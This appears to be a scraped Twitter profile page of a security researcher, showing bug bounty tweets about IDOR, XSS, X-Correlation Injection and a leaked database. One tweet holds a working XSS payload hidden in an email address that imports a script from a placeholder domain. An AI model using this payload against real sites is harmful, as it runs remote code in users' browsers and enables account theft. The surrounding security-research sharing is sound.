Tabassum (@ehtabbu) 's Twitter Profile
Tabassum

@ehtabbu

Security Researcher | Pentester | Coder 👩‍💻

ID: 803969319281430528

linkhttps://hackerone.com/ehtabbu?type=user calendar_today30-11-2016 14:29:57

76 Tweet

2,2K Followers

196 Following

Nithin 🦹‍♂️ (@thebinarybot) 's Twitter Profile Photo

This repo contains fantastic notes on different vulnerabilities such as: - IDOR - LFI - SSRF and more. Check it out now! github.com/daffainfo/AllA…

zseano (@zseano) 's Twitter Profile Photo

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

Intigriti (@intigriti) 's Twitter Profile Photo

This is the thread I wish someone created for me when I started participating in bug bounty! 😅 Not everyone shares these methods... but Here are a few tips to help you identify & exploit more IDOR vulnerabilities! 🤑 🧵 👇

Critical Thinking - Bug Bounty Podcast (@ctbbpodcast) 's Twitter Profile Photo

Frans Rosen was on the pod last week and dropped some mind-bending X-Correlation Injection research on us. Including these gems on how to test for it... 1/7

Frans Rosen was on the pod last week and dropped some mind-bending X-Correlation Injection research on us.

Including these gems on how to test for it...

1/7
Nagli (@galnagli) 's Twitter Profile Photo

Critical vulnerabilities doesn't have to be complex or have a CVE - DeepSeek publicly exposed their internal ClickHouse database to the world, without any authentication at all, and leaked sensitive data. No one is safe from security mistakes, follow along to learn more 🧵

Critical vulnerabilities doesn't have to be complex or have a CVE - <a href="/deepseek_ai/">DeepSeek</a> publicly exposed their internal ClickHouse database to the world, without any authentication at all, and leaked sensitive data.

No one is safe from security mistakes, follow along to learn more 🧵